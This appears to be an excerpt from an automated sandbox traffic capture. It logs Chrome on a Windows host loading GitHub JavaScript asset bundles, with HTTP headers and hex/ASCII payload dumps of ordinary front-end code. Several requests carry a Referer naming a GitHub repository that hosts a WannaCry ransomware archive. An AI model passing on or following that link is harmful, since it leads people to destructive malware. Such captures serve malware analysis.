                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 66 72 65 65 20 74 6f 20 64 72 6f 70 20 62 79 20 23 70 73 65 2d 61 72 63 68 69 74 65 63 74 75 72 65 20 69 66 20 79 6f 75 20 68 61 76 65 20 61 6e 79 20 61 64 64 69 74 69 6f 6e 61 6c 20 71 75 65 73 74 69 6f 6e 73 20 61 62 6f 75 74 20 54 72 75 73 74 65 64 20 54 79 70 65 73 20 6f 72 20 43 53 50 2e 60 29 2c 75 3d 21 30 29 7d 29 7d 2c 38 36 30 35 38 3a 28 65 2c 74 2c 6f 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6f 2e 64 28 74 2c 7b 52 3a 28 29 3d 3e 41 6e 61 6c 79 74 69 63 73 43 6c 69 65 6e 74 7d 29 3b 76 61 72 20 72 3d 6f 28 38 32 39 31 38 29 3b 6c 65 74 20 41 6e 61 6c 79 74 69 63 73 43 6c 69 65 6e 74 3d 63 6c 61 73 73 20 41 6e 61 6c 79 74 69 63 73 43 6c 69 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d
                                                                                      Data Ascii: free to drop by #pse-architecture if you have any additional questions about Trusted Types or CSP.`),u=!0)})},86058:(e,t,o)=>{"use strict";o.d(t,{R:()=>AnalyticsClient});var r=o(82918);let AnalyticsClient=class AnalyticsClient{constructor(e){this.options=
                                                                                      2024-03-23 14:47:22 UTC1279INData Raw: 69 65 6e 74 57 69 64 74 68 26 26 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 29 2c 60 24 7b 74 7d 78 24 7b 65 7d 60 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 22 75 6e 6b 6e 6f 77 6e 22 7d 7d 28 29 2c 62 72 6f 77 73 65 72 5f 6c 61 6e 67 75 61 67 65 73 3a 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 3f 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 2e 6a 6f 69 6e 28 22 2c 22 29 3a 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 7c 7c 22 22 2c 70 69 78 65 6c 5f 72 61 74 69 6f 3a 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 2c 74 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f
                                                                                      Data Ascii: ientWidth&&(t=document.body.clientWidth,e=document.body.clientHeight),`${t}x${e}`}catch(e){return"unknown"}}(),browser_languages:navigator.languages?navigator.languages.join(","):navigator.language||"",pixel_ratio:window.devicePixelRatio,timestamp:Date.no


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.1649720185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC699OUTGET /assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-9f960d9b217c.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 9584
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 24 Oct 2023 17:57:35 GMT
                                                                                      ETag: 0x8DBD4BAB420D672
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:22 GMT
                                                                                      Age: 2517013
                                                                                      X-Served-By: cache-iad-kiad7000063-IAD, cache-ewr18166-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 7409, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 85555977d48a15901866a9aca4f9139246fca3a7
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 73 65 6c 65 63 74 6f 72 2d 6f 62 73 65 72 76 65 72 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 22 5d 2c 7b 33 36 30 37 31 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 4e 37 3a 28 29 3d 3e 46 7d 29 3b 76 61 72 20 6e 3d 72 28 38 34 33 39 29 2c 6f 3d 6e 75 6c 6c 2c 69 3d 6e 75 6c 6c 2c 73 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 76 61 72 20 72 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 76 61 72 20 65 3d 72 3b
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_selector-observer_dist_index_esm_js"],{36071:(e,t,r)=>{r.d(t,{N7:()=>F});var n=r(8439),o=null,i=null,s=[];function a(e,t){var r=[];function n(){var e=r;
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 73 68 28 65 2e 69 64 29 7d 7d 7d 28 73 2c 69 29 29 3a 6f 3d 3d 3d 79 3f 70 28 73 2c 69 29 3a 6f 3d 3d 3d 77 26 26 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 68 2e 67 65 74 28 74 29 3b 69 66 28 72 29 7b 66 6f 72 28 76 61 72 20 6e 3d 72 2e 73 6c 69 63 65 28 30 29 2c 6f 3d 30 3b 6f 3c 6e 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5b 6f 5d 5d 3b 69 66 28 69 29 7b 76 61 72 20 73 3d 69 2e 65 6c 65 6d 65 6e 74 73 2e 69 6e 64 65 78 4f 66 28 74 29 3b 2d 31 21 3d 3d 73 26 26 69 2e 65 6c 65 6d 65 6e 74 73 2e 73 70 6c 69 63 65 28 73 2c 31 29 3b 76 61 72 20 61 3d 64 2e 67 65 74 28 74 29 2c 6c 3d 61 3f 61 5b 22 22 2b 69 2e 69 64 5d 3a 6e 75 6c 6c 3b 6c 26 26 6c 2e 72 65 6d 6f 76 65 26 26 6c 2e 72 65 6d 6f 76 65 2e 63 61 6c 6c 28
                                                                                      Data Ascii: sh(e.id)}}}(s,i)):o===y?p(s,i):o===w&&function(e,t){var r=h.get(t);if(r){for(var n=r.slice(0),o=0;o<n.length;o++){var i=e[n[o]];if(i){var s=i.elements.indexOf(t);-1!==s&&i.elements.splice(s,1);var a=d.get(t),l=a?a[""+i.id]:null;l&&l.remove&&l.remove.call(
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 69 5d 29 7d 69 66 28 22 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 22 69 6e 20 72 29 7b 76 61 72 20 73 3d 68 2e 67 65 74 28 72 29 3b 69 66 28 73 29 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 73 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 7b 76 61 72 20 6c 3d 65 2e 6f 62 73 65 72 76 65 72 73 5b 73 5b 61 5d 5d 3b 6c 26 26 21 65 2e 73 65 6c 65 63 74 6f 72 53 65 74 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 28 72 2c 6c 2e 73 65 6c 65 63 74 6f 72 29 26 26 74 2e 70 75 73 68 28 5b 79 2c 72 2c 6c 5d 29 7d 7d 7d 76 61 72 20 41 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20
                                                                                      Data Ascii: i])}if("querySelectorAll"in r){var s=h.get(r);if(s)for(var a=0;a<s.length;a++){var l=e.observers[s[a]];l&&!e.selectorSet.matchesSelector(r,l.selector)&&t.push([y,r,l])}}}var A="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 2a 22 29 2c 73 3d 30 3b 73 3c 69 2e 6c 65 6e 67 74 68 3b 73 2b 2b 29 74 2e 70 75 73 68 28 5b 77 2c 69 5b 73 5d 5d 29 7d 7d 7d 28 30 2c 74 2c 6f 2e 72 65 6d 6f 76 65 64 4e 6f 64 65 73 29 29 3a 22 61 74 74 72 69 62 75 74 65 73 22 3d 3d 3d 6f 2e 74 79 70 65 26 26 78 28 65 2c 74 2c 6f 2e 74 61 72 67 65 74 29 7d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 6d 29 7b 76 61 72 20 74 3d 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 72 3d 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 6e 3d 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 72 29 2c 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 2c 74 2e 74 65 78 74 43 6f 6e 74 65 6e 74
                                                                                      Data Ascii: *"),s=0;s<i.length;s++)t.push([w,i[s]])}}}(0,t,o.removedNodes)):"attributes"===o.type&&x(e,t,o.target)}(function(e){if(null===m){var t=e.createElement("div"),r=e.createElement("div"),n=e.createElement("div");t.appendChild(r),r.appendChild(n),t.textContent
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 61 72 20 74 3d 65 2e 65 6c 65 6d 65 6e 74 73 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 70 28 65 2c 74 5b 72 5d 29 3b 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 53 65 74 2e 72 65 6d 6f 76 65 28 65 2e 73 65 6c 65 63 74 6f 72 2c 65 29 2c 64 65 6c 65 74 65 20 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5b 65 2e 69 64 5d 7d 2c 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 67 67 65 72 4f 62 73 65 72 76 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 5b 5d 3b 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 69 66 28 22 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 22 69 6e 20 72 29 7b 78 28 65 2c 74 2c 72 29 3b 66 6f 72 28 76 61 72 20 6e 3d 72 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2a 22 29 2c 6f 3d 30 3b 6f 3c
                                                                                      Data Ascii: ar t=e.elements,r=0;r<t.length;r++)p(e,t[r]);this.selectorSet.remove(e.selector,e),delete this.observers[e.id]},k.prototype.triggerObservers=function(e){var t=[];(function(e,t,r){if("querySelectorAll"in r){x(e,t,r);for(var n=r.querySelectorAll("*"),o=0;o<
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 7d 7d 29 3b 76 61 72 20 63 3d 2f 5e 28 28 3f 3a 5b 5c 77 5c 75 30 30 63 30 2d 5c 75 46 46 46 46 5c 2d 5d 7c 5c 5c 2e 29 2b 29 2f 67 3b 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 64 65 78 65 73 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 22 54 41 47 22 2c 73 65 6c 65 63 74 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 69 66 28 74 3d 65 2e 6d 61 74 63 68 28 63 29 29 72 65 74 75 72 6e 20 74 5b 30 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 2c 65 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 5b 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 7d 7d 29 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 64 65 78 65 73 2e 64 65 66 61 75 6c 74 3d 7b 6e 61 6d 65 3a 22 55 4e 49 56 45 52 53 41 4c 22 2c 73
                                                                                      Data Ascii: }});var c=/^((?:[\w\u00c0-\uFFFF\-]|\\.)+)/g;n.prototype.indexes.push({name:"TAG",selector:function(e){var t;if(t=e.match(c))return t[0].toUpperCase()},element:function(e){return[e.nodeName.toUpperCase()]}}),n.prototype.indexes.default={name:"UNIVERSAL",s
                                                                                      2024-03-23 14:47:22 UTC1316INData Raw: 61 29 29 2c 69 3d 3d 3d 74 68 69 73 2e 69 6e 64 65 78 65 73 2e 64 65 66 61 75 6c 74 26 26 74 68 69 73 2e 6c 6f 67 44 65 66 61 75 6c 74 49 6e 64 65 78 55 73 65 64 28 72 29 2c 28 6c 3d 61 2e 6d 61 70 2e 67 65 74 28 73 29 29 7c 7c 28 6c 3d 5b 5d 2c 61 2e 6d 61 70 2e 73 65 74 28 73 2c 6c 29 29 2c 6c 2e 70 75 73 68 28 72 29 3b 74 68 69 73 2e 73 69 7a 65 2b 2b 2c 68 2e 70 75 73 68 28 65 29 7d 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 6f 76 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 2c 69 2c 73 2c 61 2c 6c 2c 63 2c 75 3d 74 68 69 73 2e 61 63 74 69 76 65 49 6e 64 65 78 65 73 2c 66 3d 7b 7d 2c 68 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68
                                                                                      Data Ascii: a)),i===this.indexes.default&&this.logDefaultIndexUsed(r),(l=a.map.get(s))||(l=[],a.map.set(s,l)),l.push(r);this.size++,h.push(e)}},n.prototype.remove=function(e,t){if("string"==typeof e){var r,n,o,i,s,a,l,c,u=this.activeIndexes,f={},h=1==arguments.length


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.1649721185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC696OUTGET /assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-086f7a27bac0.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC690INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 8578
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 13 Dec 2023 20:04:22 GMT
                                                                                      ETag: 0x8DBFC16B2EB2DBF
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:22 GMT
                                                                                      Age: 1897458
                                                                                      X-Served-By: cache-iad-kcgs7200056-IAD, cache-ewr18131-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 2833, 882
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 4392c807877b629ae0a60dd214077653d1d92be8
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 66 6f 63 75 73 2d 7a 6f 6e 65 5f 6a 73 22 5d 2c 7b 34 38 35 34 32 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6c 65 74 20 72 3b 6e 2e 64 28 74 2c 7b 51 77 3a 28 29 3d 3e 69 2c 4c 4d 3a 28 29 3d 3e 76 2c 76 35 3a 28 29 3d 3e 62 2c 6b 6d 3a 28 29 3d 3e 67 2c 70 64 3a 28 29 3d 3e 41 2c 42 47 3a 28 29 3d 3e 66 7d 29 3b 76 61 72 20 69 2c 6f 3d 6e 28 34 34 35 34 32 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 72
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js"],{48542:(e,t,n)=>{let r;n.d(t,{Qw:()=>i,LM:()=>v,v5:()=>b,km:()=>g,pd:()=>A,BG:()=>f});var i,o=n(44542);function l(){r
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 65 66 74 22 3d 3d 3d 65 2e 6b 65 79 7c 7c 22 41 72 72 6f 77 55 70 22 3d 3d 3d 65 2e 6b 65 79 29 72 65 74 75 72 6e 22 73 74 61 72 74 22 3b 69 66 28 22 41 72 72 6f 77 52 69 67 68 74 22 3d 3d 3d 65 2e 6b 65 79 7c 7c 22 41 72 72 6f 77 44 6f 77 6e 22 3d 3d 3d 65 2e 6b 65 79 29 72 65 74 75 72 6e 22 65 6e 64 22 7d 72 65 74 75 72 6e 20 74 7d 6c 65 74 20 66 3d 22 64 61 74 61 2d 69 73 2d 61 63 74 69 76 65 2d 64 65 73 63 65 6e 64 61 6e 74 22 2c 76 3d 22 61 63 74 69 76 61 74 65 64 2d 64 69 72 65 63 74 6c 79 22 2c 62 3d 22 61 63 74 69 76 61 74 65 64 2d 69 6e 64 69 72 65 63 74 6c 79 22 2c 41 3d 22 64 61 74 61 2d 68 61 73 2d 61 63 74 69 76 65 2d 64 65 73 63 65 6e 64 61 6e 74 22 3b 66 75 6e 63 74 69 6f 6e 20 67 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 67 2c 77 3b
                                                                                      Data Ascii: eft"===e.key||"ArrowUp"===e.key)return"start";if("ArrowRight"===e.key||"ArrowDown"===e.key)return"end"}return t}let f="data-is-active-descendant",v="activated-directly",b="activated-indirectly",A="data-has-active-descendant";function g(e,t){var n,r,o,g,w;
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 72 3d 6e 75 6c 6c 3d 3d 3d 28 6e 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 66 6f 63 75 73 61 62 6c 65 45 6c 65 6d 65 6e 74 46 69 6c 74 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 63 61 6c 6c 28 74 2c 65 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 7c 7c 72 7d 29 3b 69 66 28 30 21 3d 3d 6e 2e 6c 65 6e 67 74 68 29 7b 66 6f 72 28 6c 65 74 20 65 20 6f 66 28 54 2e 73 70 6c 69 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 65 5b 30 5d 3b 69 66 28 30 3d 3d 3d 54 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 30 3b 6c 65 74 20 6e 3d 30 2c 72 3d 54 2e 6c 65 6e 67 74 68 2d 31 3b 66 6f 72 28 3b 6e 3c 3d 72 3b 29 7b 6c 65 74 20 65 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 6e 2b 72 29 2f 32 29 2c 69 3d 54 5b 65 5d 3b
                                                                                      Data Ascii: r=null===(n=null==t?void 0:t.focusableElementFilter)||void 0===n?void 0:n.call(t,e))||void 0===r||r});if(0!==n.length){for(let e of(T.splice(function(e){let t=e[0];if(0===T.length)return 0;let n=0,r=T.length-1;for(;n<=r;){let e=Math.floor((n+r)/2),i=T[e];
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 74 4c 69 73 74 65 6e 65 72 28 22 66 6f 63 75 73 69 6e 22 2c 65 3d 3e 7b 65 2e 74 61 72 67 65 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 54 2e 69 6e 63 6c 75 64 65 73 28 65 2e 74 61 72 67 65 74 29 26 26 28 78 2e 66 6f 63 75 73 28 7b 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 3a 44 7d 29 2c 4d 28 65 2e 74 61 72 67 65 74 29 29 7d 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 6d 6f 76 65 22 2c 28 7b 74 61 72 67 65 74 3a 65 7d 29 3d 3e 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 4e 6f 64 65 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 74 3d 54 2e 66 69 6e 64 28 74 3d 3e 74 2e 63 6f 6e 74 61 69 6e 73 28 65 29 29 3b 74 26 26 4d 28 74 29 7d 2c 7b 73 69 67 6e 61 6c 3a 4b 2c 63 61 70 74 75 72
                                                                                      Data Ascii: tListener("focusin",e=>{e.target instanceof HTMLElement&&T.includes(e.target)&&(x.focus({preventScroll:D}),M(e.target))}),e.addEventListener("mousemove",({target:e})=>{if(!(e instanceof Node))return;let t=T.find(t=>t.contains(e));t&&M(t)},{signal:K,captur
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 41 72 65 61 45 6c 65 6d 65 6e 74 3b 69 66 28 69 26 26 28 31 3d 3d 3d 72 7c 7c 22 48 6f 6d 65 22 3d 3d 3d 6e 7c 7c 22 45 6e 64 22 3d 3d 3d 6e 29 7c 7c 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 53 65 6c 65 63 74 45 6c 65 6d 65 6e 74 26 26 28 31 3d 3d 3d 72 7c 7c 22 41 72 72 6f 77 44 6f 77 6e 22 3d 3d 3d 6e 26 26 6c 28 29 26 26 21 65 2e 6d 65 74 61 4b 65 79 7c 7c 22 41 72 72 6f 77 44 6f 77 6e 22 3d 3d 3d 6e 26 26 21 6c 28 29 26 26 65 2e 61 6c 74 4b 65 79 29 7c 7c 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 54 65 78 74 41 72 65 61 45 6c 65 6d 65 6e 74 26 26 28 22 50 61 67 65 55 70 22 3d 3d 3d 6e 7c 7c 22 50 61 67 65 44 6f 77 6e 22 3d 3d 3d 6e 29 29 72 65 74 75 72 6e 21 30 3b 69 66 28 69 29 7b 6c 65 74 20 65 3d 30 3d 3d 3d 74 2e 73 65 6c 65 63
                                                                                      Data Ascii: AreaElement;if(i&&(1===r||"Home"===n||"End"===n)||t instanceof HTMLSelectElement&&(1===r||"ArrowDown"===n&&l()&&!e.metaKey||"ArrowDown"===n&&!l()&&e.altKey)||t instanceof HTMLTextAreaElement&&("PageUp"===n||"PageDown"===n))return!0;if(i){let e=0===t.selec
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 72 26 26 22 73 69 67 6e 61 6c 22 69 6e 20 72 26 26 72 2e 73 69 67 6e 61 6c 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 62 6f 72 74 53 69 67 6e 61 6c 26 26 65 2e 63 61 6c 6c 28 72 2e 73 69 67 6e 61 6c 2c 22 61 62 6f 72 74 22 2c 28 29 3d 3e 7b 74 68 69 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6e 2c 72 29 7d 29 2c 65 2e 63 61 6c 6c 28 74 68 69 73 2c 74 2c 6e 2c 72 29 7d 7d 28 29 2c 72 3d 21 30 29 7d 7d 2c 37 38 31 36 30 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 2a 72 28 65 2c 74 3d 7b 7d 29 7b 76 61 72 20 6e 2c 72 3b 6c 65 74 20 69 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 74 2e 73
                                                                                      Data Ascii: tListener=function(t,n,r){return"object"==typeof r&&"signal"in r&&r.signal instanceof AbortSignal&&e.call(r.signal,"abort",()=>{this.removeEventListener(t,n,r)}),e.call(this,t,n,r)}}(),r=!0)}},78160:(e,t,n)=>{function*r(e,t={}){var n,r;let i=null!==(n=t.s
                                                                                      2024-03-23 14:47:22 UTC310INData Raw: 74 61 62 6c 65 22 29 7c 7c 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 41 6e 63 68 6f 72 45 6c 65 6d 65 6e 74 29 7c 7c 6e 75 6c 6c 21 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 29 29 26 26 2d 31 21 3d 3d 65 2e 74 61 62 49 6e 64 65 78 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 3d 21 31 29 7b 72 65 74 75 72 6e 20 6f 28 65 2c 74 29 26 26 22 2d 31 22 21 3d 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 29 7d 6e 2e 64 28 74 2c 7b 45 42 3a 28 29 3d 3e 6f 2c 4f 3a 28 29 3d 3e 69 2c 57 71 3a 28 29 3d 3e 6c 2c 68 54 3a 28 29 3d 3e 72 7d 29 7d 7d 5d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d
                                                                                      Data Ascii: table")||(!(e instanceof HTMLAnchorElement)||null!=e.getAttribute("href"))&&-1!==e.tabIndex}function l(e,t=!1){return o(e,t)&&"-1"!==e.getAttribute("tabindex")}n.d(t,{EB:()=>o,O:()=>i,Wq:()=>l,hT:()=>r})}}]);//# sourceMappingURL=vendors-node_modules_prim


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.1649722185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC699OUTGET /assets/vendors-node_modules_github_relative-time-element_dist_index_js-c76945c5961a.js HTTP/1.1
